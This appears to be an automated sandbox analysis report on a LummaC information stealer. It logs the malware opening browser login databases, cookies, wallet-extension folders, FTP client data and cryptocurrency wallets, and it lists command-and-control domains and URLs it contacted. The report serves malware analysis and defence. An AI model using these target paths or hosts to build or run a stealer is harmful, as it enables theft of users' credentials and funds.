Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Climb.com	Binary or memory string: WIN_81
Source: Climb.com	Binary or memory string: WIN_XP
Source: Alt.18.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Climb.com	Binary or memory string: WIN_XPe
Source: Climb.com	Binary or memory string: WIN_VISTA
Source: Climb.com	Binary or memory string: WIN_7
Source: Climb.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\HQJBRDYKDE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\HQJBRDYKDE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior

Source: Yara match	File source: 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2332004575.0000000001155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Climb.com PID: 7780, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Climb.com PID: 7780, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00132263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		21_2_00132263
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00131C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		21_2_00131C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	2 Valid Accounts	4 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	21 Access Token Manipulation	12 Software Packing	NTDS	239 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	1171 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Masquerading	Cached Domain Credentials	561 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	14 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	561 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
es5qBEFupj.exe	33%	Virustotal		Browse
es5qBEFupj.exe	39%	ReversingLabs
es5qBEFupj.exe	100%	Avira	HEUR/AGEN.1313526
es5qBEFupj.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\768400\Climb.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\PasoCattle.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Set-up.exe	70%	ReversingLabs	Win32.Trojan.Amadey

Source	Detection	Scanner	Label
https://spuriotis.click/3	0%	Avira URL Cloud	safe
https://spuriotis.click/	0%	Avira URL Cloud	safe
https://spuriotis.click/-	0%	Avira URL Cloud	safe
https://spuriotis.click:443/apiocal	0%	Avira URL Cloud	safe
spuriotis.click	0%	Avira URL Cloud	safe
https://spuriotis.click:443/api	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	100%	Avira URL Cloud	malware
https://spuriotis.click/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
spuriotis.click	172.67.128.184	true	true	unknown
home.fortth14ht.top	194.87.58.92	true	false	high
httpbin.org	34.226.108.155	true	false	high
yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	false		high
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://spuriotis.click/api	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high
prisonyfork.buzz	false		high
spuriotis.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://html4/loose.dtd	es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://duckduckgo.com/chrome_newtab	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	Set-up.exe, 00000008.00000003.1525266864.000000000130B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000008.00000002.1526147549.0000000000AF9000.00000004.00000001.01000000.00000008.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.css	es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
